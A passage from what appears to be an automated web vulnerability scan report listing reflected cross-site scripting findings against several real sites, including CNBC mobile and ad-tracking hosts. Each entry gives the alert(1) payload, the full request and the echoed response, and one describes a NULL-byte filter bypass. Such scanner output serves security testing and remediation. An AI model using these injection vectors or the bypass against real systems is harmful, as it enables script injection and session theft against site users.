Set-Cookie: OAM_REQ=VERSION_4~kFAC1XaMEpaJ8SJOUrf%2fWt2Eo7fTd6kx5GkSobJXbTa9ofaZvm8X1pAbDFt2MEuS3MePYuT%2fmFC6jCqPOKsg5EGn8%2f5siYPls53KS2IfE5cAKYqV2nwLNlXuhTnUYD7%2bqgU6DNG1zrFdSZwFZvxFyciZDIbbbnhH9oRg0ceM1muAJi1B5fV43af5UynsM4YyGgbbfAlBREllNguLNsO9pgPSAgLfyd4J8jO1mR8hmBly2Qe1K8Tieg3%2fXbAEmyHqq8mBg8gmx4%2f7JOAbCcxazh%2brWrBI91l82SUGo8jfrb6mv7Am3WPBKU1mn48kN%2bqo2VJzi7%2fsLFGYYAnXWBwN7TjAFSkQzufA1dxnEwxBoVrJBif6NqyI5sc73QqvYIVs5s2uSoVB7OG4vusTIrSC3M1J%2bXw34SlfE6bwoWG7hXLJu%2fxGFD7tU7q6cnoKfMLgmk3RVX0WkuFW3l%2bNIRESpgSboEw1l80kwLoK5SB9TZhJ9U9B1LLNAKsjfaXmnYo7qK%2f9ATN1N7IxQht%2fXXmrWmsgSPIJWSCwMMYOqQ2mKce34pt0uSUhsDaGJrlfznnWIuParzsU26PBHAKlJlGGCAFsC1XiJQ9pygZGlYY7vWScqX37bn%2b%2fhLbSwbUQQu0y5z98Ulo%2b5IFLEPHYoOYJaWY4IuX%2fO0vKkiR8QgbH4bg%2fM6onyO9R%2f%2fdVrHGJJrJ%2fKrj00c%2fla7ybboS2B2PSyDf2BWQfi9EP5CMv8xmSwUVWpEf8YztPrfG6JBJt6sFIFZXLYyL9c3Lgh0Js63KCgdgTX5zatHuB9iQ%2b9vr%2bSHXkhdlkcTjBT3rKbEsEpxSgv2lavD2cqY8YSS2jwLZEvEcR1er6uRFGqya1OarXmPCdtpVogeosgxLQ%2bUAptgSI2sbJyRV%2f8fFlCu3WRB0otUeqy4dOida3y5yQ9mxxFfQar9jsGGvnEeX%2bhhsHo2PXtKnmfuGfUwyR6C8THvE4579RVsK84IEbwdym4Y0jvuQSFW81brTJ2JzejPjySRJDjAtdxl%2faO6SSI1B4FGvXS9lvaTvmPKCntQ%2bjbtwuN1kY7tjw9qplEyyxRJcA3ssOLdIvA4zwuVU0HwhaV4geRx7Uf94lsiEExtzGV2WPn9Y%2bc3X37HfRS3VshKqfNvksWF%2bbnL9fJRo3Z6V9Ho8BR3NbO%2bw%2fb4SPOP1grldEk6sBfPdD9knTg%2fTP1uM2ut2wR7doZ9YcUJZZ16%2f9trfZqHMjEX%2fiaKguZr46uYqTab2AK6dpfBmLNhNogN%2fPjJDVvbSwgJVDCXWY%2fPHLL4myDtby3Eyw7NQPgCUCK9s4T3NIUumy4Cnja86gM49x2Qa98H5TvFvv%2bzTMtB5yKYmSJfnpGViX0DZbiyV1E%2fZDQMP4btXxU3PTgqGbXx8ZYi3s61ou3twd3XAy8ulz4Z4BfaU7A%2fL2aB%2fSJzq8R%2f%2bdvQoskKYNJ39BX8ZIGoecc3vJTrnbVRFebOhc5P93wpRnhOeMughVxlUGmxnSx7ZiuirRQudGH4E8O7spt2Aaf5abIr62aflBa7yvQT%2bph5eVgyNyrS4P1OF%2f9oiDfhf8bb647N0kyr3JPyNDScpyqObS9CMjaVJUkcWKS7uakG8Vwsc1ndOVxHQRr8H1rW3SC3g3EfEzukgorgSTEWVMVk1Jm%2fUa2XDd89JKZHQJ3GMb5oZeTSn%2fR%2fFnUJr8OjZcE6BpcWS73EZN3WPDKjFkm8NVwKJGRXNcAwTWsca3SJEOOA%3d%3d; path=/; HttpOnly
X-ORACLE-DMS-ECID: 0000J8zXqFk6uHK6EVADUS1EHWFB01tasY
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: BIGipServerloginadc_oracle_com_http=1561105037.16927.0000; expires=Wed, 07-Sep-2011 00:17:10 GMT; path=/
Content-Length: 2386

<html><body onLoad="document.myForm.submit()"><noscript><p>JavaScript is required. Enable JavaScript to use OAM Server.</p></noscript><form action="https://login.oracle.com/mysso/signon.jsp" method="p
...[SNIP]...
<input type="hidden" name="request_id" value="-11174233175931698103c7b4"><script>alert(1)</script>d6751adef14af5029">
...[SNIP]...

3.52. http://m.cnbc.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://m.cnbc.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 62c45'-alert(1)-'fbc41ead6d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /?62c45'-alert(1)-'fbc41ead6d9=1 HTTP/1.1
Host: m.cnbc.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; __qseg=Q_D; cnbc_regional_cookie=US; s_cc=true; s_nr=1315339390340; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:05:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Expires: 0
Last-Modified: Tue, 06 Sep 2011 15:05:12 GMT
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Via: 1.1 aicache6
Content-Length: 13408
X-Aicache-OS: 64.210.193.250:80
Connection: Keep-Alive
Keep-Alive: max=20

<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>

...[SNIP]...
<script type="text/javascript"> setTimeout('window.location.href=\'http://m.cnbc.com/?62c45'-alert(1)-'fbc41ead6d9=1&refresh=true\'',300000)</script>
...[SNIP]...

3.53. http://m.cnbc.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://m.cnbc.com
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e284c'-alert(1)-'58c7eb2456a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /favicon.icoe284c'-alert(1)-'58c7eb2456a HTTP/1.1
Host: m.cnbc.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: s_cc=true; s_nr=1315339276909; s_sq=nbcuglobal%2C%20nbcucnbcd%2C%20nbcucnbcbu%3D%2526pid%253DSearch%25257CAll%25257CAllT%2526pidt%253D1%2526oid%253Dhttps%25253A//register.cnbc.com/memberCenter.do%2526ot%253DA; __qseg=Q_D|Q_T|Q_2168|Q_2006|Q_2005|Q_2004|Q_2003|Q_2001|Q_1997|Q_1994|Q_1962|Q_1914|Q_384|Q_381|Q_380|Q_379|Q_378|Q_377|Q_333|Q_332|Q_326|Q_320|Q_316; __qca=P0-1990433296-1315339228713; SESS93eea98f293ea8fd633599e480cddfdc=7hpvssf67odmb1il9onl52ot53; s_vi=[CS]v1|27331BA1051D06AC-4000010700020B59[CE]; rnmd_test=x; rnmd_uuid=208.91.189.56.ec26afb2-0d15-422b-819b-848bfbbe52d8

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 15:08:29 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=99
Content-Type: text/html; charset=utf-8
Via: 1.1 C aicache6
Content-Length: 4010
X-Aicache-OS: 64.210.193.252:80
Connection: Keep-Alive
Keep-Alive: max=20
Expires: Wed, 07 Sep 2011 15:08:30 GMT

<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>

...[SNIP]...
<script type="text/javascript"> setTimeout('window.location.href=\'http://m.cnbc.com/favicon.icoe284c'-alert(1)-'58c7eb2456a?refresh=true\'',300000)</script>
...[SNIP]...

3.54. http://m.cnbc.com/mytest/ipecho.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://m.cnbc.com
Path:	/mytest/ipecho.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c3e92'-alert(1)-'f261e685920 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mytestc3e92'-alert(1)-'f261e685920/ipecho.php HTTP/1.1
Host: m.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1315339005443; __qseg=Q_D

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 15:05:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Expires: 0
Last-Modified: Tue, 06 Sep 2011 15:05:16 GMT
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Via: 1.1 aicache6
Content-Length: 4643
X-Aicache-OS: 64.210.193.251:80
Connection: close

<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>

...[SNIP]...
<script type="text/javascript"> setTimeout('window.location.href=\'http://m.cnbc.com/mytestc3e92'-alert(1)-'f261e685920/ipecho.php?refresh=true\'',300000)</script>
...[SNIP]...

3.55. http://m.cnbc.com/mytest/ipecho.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://m.cnbc.com
Path:	/mytest/ipecho.php

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59238'-alert(1)-'0408d9d8ef3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /mytest/ipecho.php59238'-alert(1)-'0408d9d8ef3 HTTP/1.1
Host: m.cnbc.com
Proxy-Connection: keep-alive
Referer: http://search.cnbc.com/main.do?target=all&keywords=xss&categories=exclude
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1380789371-1315338919989; cnbc_regional_cookie=US; s_cc=true; s_sq=%5B%5BB%5D%5D; s_nr=1315339005443; __qseg=Q_D

Response

HTTP/1.1 404 Not Found
Date: Tue, 06 Sep 2011 15:05:20 GMT
Server: Apache
X-Powered-By: PHP/5.2.10
Expires: 0
Last-Modified: Tue, 06 Sep 2011 15:05:20 GMT
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Via: 1.1 aicache6
Content-Length: 4642
X-Aicache-OS: 64.210.193.252:80
Connection: close

<!DOCTYPE html PUBLIC "-//WAPFORUM//DTD XHTML Mobile 1.0//EN" "http://www.wapforum.org/DTD/xhtml-mobile10.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr">
<head>

...[SNIP]...
<script type="text/javascript"> setTimeout('window.location.href=\'http://m.cnbc.com/mytest/ipecho.php59238'-alert(1)-'0408d9d8ef3?refresh=true\'',300000)</script>
...[SNIP]...

3.56. http://netsuite.tt.omtrdc.net/m2/netsuite/mbox/standard [mbox parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://netsuite.tt.omtrdc.net
Path:	/m2/netsuite/mbox/standard

Issue detail

The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 9ed34<script>alert(1)</script>42adcdc5dfa was submitted in the mbox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /m2/netsuite/mbox/standard?mboxHost=www.netsuite.com&mboxSession=1315341135013-154927&mboxPage=1315341135013-154927&screenHeight=1200&screenWidth=1920&browserWidth=1266&browserHeight=909&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=me-ecomm-form-test9ed34<script>alert(1)</script>42adcdc5dfa&mboxId=0&mboxTime=1315323135041&mboxURL=http%3A%2F%2Fwww.netsuite.com%2Fportal%2Fseo-landing-page%2Fecommerce%2Fecommerce-2.html%3Fgclid%3DCMyov8D4iKsCFSBCgwodRnXLzA&mboxReferrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DATG%2Be-commerce%2Bsolutio&mboxVersion=40 HTTP/1.1
Host: netsuite.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.netsuite.com/portal/seo-landing-page/ecommerce/ecommerce-2.html?gclid=CMyov8D4iKsCFSBCgwodRnXLzA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1315341135013-154927.19; Domain=netsuite.tt.omtrdc.net; Expires=Tue, 20-Sep-2011 15:33:19 GMT; Path=/m2/netsuite
Content-Type: text/javascript
Content-Length: 214
Date: Tue, 06 Sep 2011 15:33:18 GMT
Server: Test & Target

mboxFactories.get('default').get('me-ecomm-form-test9ed34<script>alert(1)</script>42adcdc5dfa',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315341135013-154927.19");

3.57. http://pg.links.channelintelligence.com/pages/CBLJS.asp [sLinkJSData parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pg.links.channelintelligence.com
Path:	/pages/CBLJS.asp

Issue detail

The value of the sLinkJSData request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f3d3c'%3balert(1)//7a40c4d48d9 was submitted in the sLinkJSData parameter. This input was echoed as f3d3c';alert(1)//7a40c4d48d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /pages/CBLJS.asp?sLinkJSData=upc%3D047400098978f3d3c'%3balert(1)//7a40c4d48d9&cii_sSKU=047400098978&cii_nRGID=1964 HTTP/1.1
Host: pg.links.channelintelligence.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp?upc=047400098978
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 35613
Cache-Control: public, max-age=3563
Expires: Tue, 06 Sep 2011 17:45:22 GMT
Date: Tue, 06 Sep 2011 16:45:59 GMT
Connection: close

function ChangeRows(roForm,rnRows){roForm.nRows.value=rnRows;roForm.submit();}
function ChangePage(roForm,rnCurrentPage){roForm.nStart.options[rnCurrentPage].selected=true;roForm.submit();}

/*

...[SNIP]...
610","middle","center",true,"",true,false,false,false,true);goWin.focus();}
function cii_VARInfo(rsCustomer,rsZip,rsSKU,rnRGID,nPGID,nVID,nRadius,nHeight,nWidth,sStatusBar){var sUrl='?upc=047400098978f3d3c';alert(1)//7a40c4d48d9&cii_nSCID=28&cii_nCTID=29&cii_sZip='+rsZip+'&cii_sSKU='+escape(rsSKU).replace('+','%2B')+'&cii_nVID='+nVID+'&cii_nRGID='+rnRGID+'&cii_nPGID='+nPGID+'&cii_nRadius='+nRadius;var oWin=ykb_PopUp('VARInfo'
...[SNIP]...

3.58. http://pg.links.channelintelligence.com/pages/CBLJS.asp [sLinkJSData parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pg.links.channelintelligence.com
Path:	/pages/CBLJS.asp

Issue detail

The value of the sLinkJSData request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94563"%3balert(1)//be0c49fb5ff was submitted in the sLinkJSData parameter. This input was echoed as 94563";alert(1)//be0c49fb5ff in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /pages/CBLJS.asp?sLinkJSData=upc%3D04740009897894563"%3balert(1)//be0c49fb5ff&cii_sSKU=047400098978&cii_nRGID=1964 HTTP/1.1
Host: pg.links.channelintelligence.com
Proxy-Connection: keep-alive
Referer: http://www.gillettevenus.com/en_US/buy_it_now/product_links.jsp?upc=047400098978
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="OTI DSP COR CURa ADMa DEVa OUR DELa STP"
X-Powered-By: ASP.NET
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 35613
Cache-Control: public, max-age=3554
Expires: Tue, 06 Sep 2011 17:45:08 GMT
Date: Tue, 06 Sep 2011 16:45:54 GMT
Connection: close

function ChangeRows(roForm,rnRows){roForm.nRows.value=rnRows;roForm.submit();}
function ChangePage(roForm,rnCurrentPage){roForm.nStart.options[rnCurrentPage].selected=true;roForm.submit();}

/*

...[SNIP]...
ocID="+rnLocID+"&cii_nRGID=1964&cii_nPGID=0&cii_nRadius=15";document.location = sUrl;}
function cii_ShowLocations(rnSCID,rnCTID,rnVID,rnLocID,rnStoreID,rnVStoreID,rnColPos){var sUrl="?upc=04740009897894563";alert(1)//be0c49fb5ff&cii_nSCID="+rnSCID+"&cii_nCTID="+rnCTID+"&cii_sZip=&cii_nIID=163810295&cii_sSKU="+escape("047400098978").replace("+","%2B")+"&cii_nVID="+rnVID+"&cii_nLocID="+rnLocID+"&cii_nStoreID="+rnStoreID+"&cii_n
...[SNIP]...

3.59. http://ping.crowdscience.com/ping.js [m parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ping.crowdscience.com
Path:	/ping.js

Issue detail

The value of the m request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %006c87d'%3balert(1)//7d11b67251b was submitted in the m parameter. This input was echoed as 6c87d';alert(1)//7d11b67251b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /ping.js?url=http%3A%2F%2Fwww.readwriteweb.com%2Fenterprise%2F2010%2F11%2Foracle.php&id=5c5c650d27&u=mozilla%2F5.0%20(windows%20nt%206.1%3B%20wow64)%20applewebkit%2F535.1%20(khtml%2C%20like%20gecko)%20chrome%2F13.0.782.220%20safari%2F535.1&x=1315341159227&c=0&t=0&v=0&m=0%006c87d'%3balert(1)//7d11b67251b&vn=2.0.4 HTTP/1.1
Host: ping.crowdscience.com
Proxy-Connection: keep-alive
Referer: http://www.readwriteweb.com/enterprise/2010/11/oracle.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __csadt_="NSBE647001:|fixed_placement||52487714041||0||1||1"; __csv=2a31db5320bf2a6b

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:33:02 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Set-Cookie: __csv=53404c51af1f5e49; Domain=.crowdscience.com; expires=Mon, 05 Dec 2011 15:33:02; Path=/
Content-Length: 8035
P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain

(function (){

var cs = CrowdScience;

cs.state = 1; // cs.states.ping_loading;

cs.invitation_beforeShow = function() {};
cs.invitation_afterShow = function() {};

cs.i
...[SNIP]...
f5524dcb2c411c47c&vguid=53404c51af1f5e49&sc=eNotjEEOwjAMBP/icxTZ3tiO8xtUhOBURIs4IP5OKnVPc5jZLz0/NKRyoff9sW80oECE1QyzFFZkoW25ndJledEw5oOv62R4heicNFEGZyu07CuNqTA3tc4yj6CR4q6Fjki9uvZEWkTL9I7fH93NH90=&m=0.6c87d';alert(1)//7d11b67251b&style=' + self.style;
return self;
})();

CrowdScience.imageUrls = [
'http://static.crowdscience.com/invlogo/dir02/logo_2_59cd36bf0aee
...[SNIP]...

3.60. http://pixel.adsafeprotected.com/jspix [anId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.adsafeprotected.com
Path:	/jspix

Issue detail

The value of the anId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 510c5"-alert(1)-"dd817178b4e was submitted in the anId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jspix?anId=144510c5"-alert(1)-"dd817178b4e&pubId=4749&campId=176996 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=81B90065048D4370292026025CE18CDC; Path=/
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 15:05:42 GMT
Connection: close

var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144510c5"-alert(1)-"dd817178b4e&pubId=4749&campId=176996",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "gsrdhvt9"
};

(function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var
...[SNIP]...

3.61. http://pixel.adsafeprotected.com/jspix [campId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.adsafeprotected.com
Path:	/jspix

Issue detail

The value of the campId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload da845"-alert(1)-"880f48e2e1c was submitted in the campId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jspix?anId=144&pubId=4749&campId=176996da845"-alert(1)-"880f48e2e1c HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=35EB1F19FAC898AF05DFBC3B925C5071; Path=/
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 15:05:42 GMT
Connection: close

var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144&pubId=4749&campId=176996da845"-alert(1)-"880f48e2e1c",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "gsrdhw0z"
};

(function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var H={INFO:"info",LOG:"log",
...[SNIP]...

3.62. http://pixel.adsafeprotected.com/jspix [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.adsafeprotected.com
Path:	/jspix

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 29f17"-alert(1)-"0d89877785d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /jspix?anId=144&pubId=4749&campId=176996&29f17"-alert(1)-"0d89877785d=1 HTTP/1.1
Host: pixel.adsafeprotected.com
Proxy-Connection: keep-alive
Referer: http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=FB69FF41E9D06173F3B7D3D9C3729F77; Path=/
Content-Type: text/javascript
Date: Tue, 06 Sep 2011 15:05:42 GMT
Connection: close

var adsafeVisParams = {
   mode : "jspix",
   jsref : "http://optimized-by.rubiconproject.com/a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250",
   adsafeSrc : "",
   adsafeSep : "",
   requrl : "http://pixel.adsafeprotected.com/",
   reqquery : "anId=144&pubId=4749&campId=176996&29f17"-alert(1)-"0d89877785d=1",
   debug : "false",
   allowPhoneHome : "false",
   phoneHomeDelay : "3000",
   asid : "gsrdhw3w"
};

(function(){var N="3.12";var v=(adsafeVisParams.debug==="true");var n=2000;var H={INFO:"info",LOG:"log
...[SNIP]...

3.63. http://pixel.adsafeprotected.com/jspix [pubId parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pixel.adsafeprotected.com
Path:	/jspix

Issue detail

The value of the pubId request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b063c"-alert(1)-"1e31f51b3df was submitted in the pubId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

